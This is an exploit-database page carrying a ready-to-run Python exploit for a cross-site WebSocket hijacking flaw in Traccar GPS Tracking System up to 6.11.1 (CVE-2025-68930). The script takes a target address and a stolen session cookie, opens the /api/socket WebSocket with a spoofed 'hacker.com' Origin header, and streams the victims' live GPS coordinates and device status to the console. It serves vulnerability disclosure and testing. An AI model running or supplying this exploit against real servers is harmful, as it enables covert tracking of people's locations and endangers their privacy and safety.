Share
## https://sploitus.com/exploit?id=PACKETSTORM:220401
# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
    # Date: 2026-02-26
    # Exploit Author: Hazar Taspinar
    # Vendor Homepage: https://www.traccar.org/
    # Software Link: https://github.com/traccar/traccar
    # Version: <= 6.11.1
    # Tested on: Windows 11 / Linux
    # CVE: CVE-2025-68930
    
    """
    Description:
    Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket). 
    An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header 
    along with a victim's valid JSESSIONID. This allows the attacker to hijack the 
    WebSocket connection and leak real-time sensitive data, including GPS coordinates 
    and device status.
    
    Requirements:
    pip install websocket-client
    """
    
    import websocket
    import argparse
    import sys
    
    def on_message(ws, message):
        print(f"[+] DATA LEAKED: {message}")
    
    def on_error(ws, error):
        print(f"[-] Error: {error}")
    
    def on_close(ws, close_status_code, close_msg):
        print("[-] Connection closed.")
    
    def on_open(ws):
        print("[*] WebSocket Handshake Successful!")
        print("[*] Connection upgraded. Streaming real-time sensitive data...\n")
    
    def main():
        parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
        parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
        parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
        parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
        
        args = parser.parse_args()
    
        # Construct the WebSocket URL
        url = f"ws://{args.target}:{args.port}/api/socket"
        
        # Malicious headers triggering the bypass
        # The 'Origin' header is set to an external domain to demonstrate lack of validation.
        headers = [
            "Origin: http://hacker.com",
            f"Cookie: JSESSIONID={args.cookie}"
        ]
    
        print(f"""
        ================================================
        TRACCAR GPS TRACKER - CSWSH EXPLOIT
        Exploit Author: Hazar Taspinar
        CVE: CVE-2025-68930
        Target: {url}
        ================================================
        """)
    
        # Initiate WebSocket connection
        ws = websocket.WebSocketApp(url,
                                    on_message=on_message,
                                    on_error=on_error,
                                    on_close=on_close,
                                    on_open=on_open,
                                    header=headers)
        
        try:
            ws.run_forever()
        except KeyboardInterrupt:
            print("\n[*] Exploit stopped by user.")
            sys.exit(0)
    
    if __name__ == "__main__":
        main()